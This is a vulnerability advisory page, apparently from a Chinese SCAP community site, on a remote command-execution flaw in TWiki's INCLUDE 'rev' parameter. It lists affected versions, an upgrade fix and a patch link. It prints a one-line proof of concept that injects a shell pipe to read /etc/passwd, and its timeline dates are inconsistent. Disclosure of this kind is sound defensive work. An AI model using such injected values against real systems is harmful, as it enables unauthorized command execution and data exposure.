TWiki contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is triggered when specially crafted shell metacharacters are passed to the 'rev' parameter, which does not perform input validation.

- 时间线

2005-09-14 Unknow
2005-09-14 2004-09-14

- 解决方案

Upgrade to version 04Sep2004 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

TWiki TWikiUsers INCLUDE Function Remote Arbitrary Command Execution Vulnerability
Input Validation Error 14960
Yes No
2005-09-28 12:00:00 2009-07-12 05:06:00
JChristophFuchs <jcf@ipp.mpg.de> and JoseLuna <luna@aditel.org> disclosed this issue to the vendor.

- 受影响的程序版本

TWiki TWiki 20040903
TWiki TWiki 20040902
TWiki TWiki 20040901
TWiki TWiki 20030201
TWiki TWiki 01-Dec-2001

- 漏洞讨论

A remote command execution vulnerability affects the application.

The revision control function of the TWikiUsers script uses the backtick shell metacharacter to construct a command line. An attacker may use a specially crafted URI to execute arbitrary commands through the shell.

This attack would occur in the context of the vulnerable application and can facilitate unauthorized remote access.

- 漏洞利用

An exploit is not required.

The following proof of concept example is available:
%INCLUDE{ "Main.TWikiUsers" rev="2|less /etc/passwd" }%

- 解决方案

The vendor has released an advisory to address this issue. Please see the referenced advisory for further information.

A patch addressing this issue has been made available at:
http://twiki.org/cgi-bin/view/Codev/UncoordinatedSecurityAlert23Feb2005


TWiki TWiki 20040902

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站